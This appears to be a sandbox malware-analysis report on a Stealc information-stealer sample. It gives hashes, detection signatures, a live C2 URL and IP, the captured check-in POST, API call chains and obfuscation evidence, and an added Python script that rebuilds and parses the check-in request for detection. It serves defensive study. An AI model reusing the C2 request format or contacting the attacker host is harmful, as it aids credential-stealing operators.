Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545099
MD5: 0d30eb6a4023a6dce770ce3d6388cb9b
SHA1: 83e8c18d4ad2b7c36d6699e7a9e25a7b552b9779
SHA256: 7ea542ed634733c045e8d30777ae4f1c9a0a87d532f336158d36887483a6af7c
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, as well as other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: 0.2.file.exe.f30000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: http://185.215.113.206/6c4adf523b719729.php/ Virustotal: Detection: 17%
Source: http://185.215.113.206/ Virustotal: Detection: 18%
Source: http://185.215.113.206 Virustotal: Detection: 18%
Source: http://185.215.113.206/6c4adf523b719729.php Virustotal: Detection: 16%
Source: file.exe Virustotal: Detection: 43%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00F49030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3A2B0 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00F3A2B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F372A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00F372A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00F3A210
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_00F3C920
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00F440F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00F3E530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00F447C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F3F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F31710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F3DB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F44B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00F43B00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F3BE40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00F3EE20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F3DF10

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 39 39 44 44 31 30 46 31 33 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="hwid"899DD10F13543207603164------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="build"tale------AFCAAEGDBKJJKECBKFHC--
Source: Joe Sandbox View IP Address: 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206 (observed 7 times; the C2 address is hard-coded, so no DNS resolution precedes the connection)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F362D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00F362D0
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php6
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpv
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/j
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206k
Source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
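The captured check-in above is the whole of what this sample sent before the sandbox stopped it: a GET / and then a multipart POST to the .php endpoint from the extracted configuration carrying only two fields, hwid and build, with no User-Agent header. The following script is an added example (not part of the sandbox report or of Stealc) that rebuilds that request from the bytes shown under "Data Raw", parses the multipart body, verifies the Content-Length, and checks the build field against the "Botnet" value from the malware configuration extractor. The looks_like_stealc_checkin heuristic is the editor's own summary of the traits visible in this capture, not the logic of Suricata SID 2044243.

```python
import re

# Constructed from the report: the POST body exactly as listed under "Data Raw".
BOUNDARY_HEX = "4146434141454744424b4a4a4b4543424b464843"   # AFCAAEGDBKJJKECBKFHC
BODY = bytes.fromhex(
    "2d2d2d2d2d2d" + BOUNDARY_HEX + "0d0a"
    + "436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b20"
      "6e616d653d2268776964220d0a0d0a"                    # name="hwid"
    + "383939444431304631333534333230373630333136340d0a"  # 899DD10F13543207603164
    + "2d2d2d2d2d2d" + BOUNDARY_HEX + "0d0a"
    + "436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b20"
      "6e616d653d226275696c64220d0a0d0a"                  # name="build"
    + "74616c650d0a"                                      # tale
    + "2d2d2d2d2d2d" + BOUNDARY_HEX + "2d2d0d0a"
)

# Request line and headers as captured; note the absence of a User-Agent header.
REQUEST = (
    b"POST /6c4adf523b719729.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n" + BODY
)

# Output of the report's malware configuration extractor.
CONFIG = {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}


def split_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, {lowercased header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("ascii").lower()] = value.strip().decode("latin-1")
    return lines[0].decode("ascii"), headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for the simple name="x" parts of a multipart/form-data body.
    The part delimiter is "--" + the boundary from the Content-Type header."""
    delimiter = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # leading empty chunk / closing "--"
            continue
        part_head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', part_head)
        if m:
            fields[m.group(1).decode("ascii")] = value.decode("latin-1")
    return fields


def classify_checkin(raw: bytes) -> dict:
    """Traits of the request that a network detection can key on."""
    request_line, headers, body = split_request(raw)
    method, path, _ = request_line.split(" ", 2)
    m = re.search(r"boundary=([^;]+)", headers.get("content-type", ""))
    fields = parse_multipart(body, m.group(1).strip()) if m else {}
    no_ua = "user-agent" not in headers
    return {
        "method": method,
        "path": path,
        "no_user_agent": no_ua,
        "content_length_ok": int(headers.get("content-length", -1)) == len(body),
        "fields": fields,
        "build_matches_config": fields.get("build") == CONFIG["Botnet"],
        "path_matches_config": CONFIG["C2 url"].endswith(path),
        # Editor's heuristic for this capture: POST to a .php path, no User-Agent,
        # exactly the hwid and build fields. Not the Suricata rule's logic.
        "looks_like_stealc_checkin": method == "POST" and path.endswith(".php")
        and no_ua and set(fields) == {"hwid", "build"},
    }


if __name__ == "__main__":
    for key, value in classify_checkin(REQUEST).items():
        print(f"{key}: {value}")
```

The build value sent in the POST ("tale") is the same string the configuration extractor reports as "Botnet", which is a quick way to confirm that a captured check-in belongs to the extracted config rather than to a different build of the same family. The hwid value is whatever the sample derived from the host; in a different sandbox run it will differ, so detection should key on the request shape, not on that value.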

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F70098 0_2_00F70098
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 0_2_0138D1F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F8B198 0_2_00F8B198
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0133D047 0_2_0133D047
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F62138 0_2_00F62138
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013730D6 0_2_013730D6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F74288 0_2_00F74288
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F9E258 0_2_00F9E258
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013893F8 0_2_013893F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01395206 0_2_01395206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FAD39E 0_2_00FAD39E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125E2AE 0_2_0125E2AE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FBB308 0_2_00FBB308
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013025A4 0_2_013025A4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138E47C 0_2_0138E47C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F9D5A8 0_2_00F9D5A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F745A8 0_2_00F745A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F54573 0_2_00F54573
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F5E544 0_2_00F5E544
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012294E1 0_2_012294E1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB96FD 0_2_00FB96FD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0136D73B 0_2_0136D73B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F766C8 0_2_00F766C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FAA648 0_2_00FAA648
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012457F6 0_2_012457F6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA6799 0_2_00FA6799
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013936AF 0_2_013936AF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F8D720 0_2_00F8D720
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012D56C9 0_2_012D56C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F9F8D6 0_2_00F9F8D6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F898B8 0_2_00F898B8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F8B8A8 0_2_00F8B8A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F84868 0_2_00F84868
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012BA841 0_2_012BA841
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01272BA2 0_2_01272BA2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F98BD9 0_2_00F98BD9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA4BA8 0_2_00FA4BA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA0B88 0_2_00FA0B88
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01300D27 0_2_01300D27
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FAAC28 0_2_00FAAC28
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0131DC3A 0_2_0131DC3A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F84DC8 0_2_00F84DC8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F85DB9 0_2_00F85DB9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F61D78 0_2_00F61D78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F8BD68 0_2_00F8BD68
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F9AD38 0_2_00F9AD38
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA1EE8 0_2_00FA1EE8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F78E78 0_2_00F78E78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138AF92 0_2_0138AF92
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138FFE3 0_2_0138FFE3
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00F34610 appears 316 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: xpxnzipx ZLIB complexity 0.9946538036142771
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00F49790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F43970 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00F43970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WPDF5R83.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name, value FROM autofillX;
Source: file.exe Virustotal: Detection: 43%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 2145792 > 1048576
Source: file.exe Static PE information: Raw size of xpxnzipx is bigger than: 0x100000 < 0x1a0c00
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.f30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00F49BB0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x2166de should be: 0x21ab5b
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: xpxnzipx
Source: file.exe Static PE information: section name: atgrbfaq
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F5A0DC push eax; retf 0_2_00F5A0F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01290106 push ebp; mov dword ptr [esp], edx 0_2_01290120
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0139D16E push 7AE96079h; mov dword ptr [esp], ebp 0_2_0139D1AB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0139D16E push ecx; mov dword ptr [esp], 5B6F04D2h 0_2_0139D1F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0139D16E push ebx; mov dword ptr [esp], eax 0_2_0139D26C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0139D16E push 401DF8B4h; mov dword ptr [esp], ecx 0_2_0139D297
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0139D16E push 76E017CFh; mov dword ptr [esp], edx 0_2_0139D2B4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_014311DF push ebx; mov dword ptr [esp], ecx 0_2_01431201
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01383182 push ecx; mov dword ptr [esp], ebp 0_2_013831D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push edx; mov dword ptr [esp], ebx 0_2_0138D1F5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], eax 0_2_0138D29C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 5C864357h; mov dword ptr [esp], edi 0_2_0138D316
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push eax; mov dword ptr [esp], ecx 0_2_0138D39B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], 12DDE9E3h 0_2_0138D3CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], ecx 0_2_0138D3E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], ebx 0_2_0138D400
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 3FDB9E17h; mov dword ptr [esp], edi 0_2_0138D495
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], eax 0_2_0138D4C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push eax; mov dword ptr [esp], ecx 0_2_0138D4CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push eax; mov dword ptr [esp], 20B28156h 0_2_0138D5A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 5F8A0B30h; mov dword ptr [esp], ecx 0_2_0138D5B3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 03695830h; mov dword ptr [esp], ebp 0_2_0138D6B3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 6083226Ah; mov dword ptr [esp], ecx 0_2_0138D6FC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ebx; mov dword ptr [esp], 058DD1BCh 0_2_0138D732
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], edx 0_2_0138D753
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 13D5455Bh; mov dword ptr [esp], esp 0_2_0138D7EA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], edx 0_2_0138D872
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 1637974Fh; mov dword ptr [esp], edi 0_2_0138D8F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ebx; mov dword ptr [esp], ebp 0_2_0138D959
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 4AD5F65Ah; mov dword ptr [esp], ebp 0_2_0138D9BE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], ebx 0_2_0138DAC0
